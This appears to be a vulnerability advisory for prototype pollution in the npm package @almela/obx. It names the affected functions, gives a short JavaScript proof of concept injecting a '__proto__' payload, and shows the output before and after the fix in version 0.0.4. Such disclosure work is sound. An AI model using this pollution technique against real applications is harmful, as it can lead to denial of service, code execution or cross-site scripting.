The module is vulnerable via three functions: add (obx/build/index.js:656), reduce (@almela/obx/build/index.js:470) and Object.set (obx/build/index.js:269), respectively. In all these implementations, the assignment of the property from source to destination occurs without proper protection.
An attacker can exploit these functions to inject a malicious payload via the built-in Object through the special properties `__proto__` or `constructor.prototype`.
Thus, the attacker can use one of these properties to pollute the application logic, which can be escalated to denial of service, remote code execution or cross-site scripting attacks.
(async () => {
  // Load the library under test; a missing install surfaces as a rejected promise.
  const lib = await import('@almela/obx');
  // Parsed JSON carrying a "__proto__" key as a plain own property.
  const payload = JSON.parse('{"__proto__":{"polluted":true}}');
  // An unrelated empty object: a change visible on its prototype means the
  // shared Object.prototype was modified.
  const victim = {};
  console.log("Before Attack: ", JSON.stringify(victim.__proto__));
  try {
    // Un-comment one call at a time
    lib.add({}, payload);
    //lib.cp ({ "__proto__.polluted": true})
    //lib.default.set ({}, "__proto__.polluted", true)
  } catch (e) {
    // Whatever the library throws is irrelevant here; only the observation
    // on the next line matters.
  }
  console.log("After Attack: ", JSON.stringify(victim.__proto__));
  // Undo the pollution so the process is left in a clean state.
  delete Object.prototype.polluted;
})();
Output:
Before Attack: {}
After Attack: {"polluted":true}
Output after a successful fix:
Before Attack: {}
After Attack: {}
Update the package to version 0.0.4.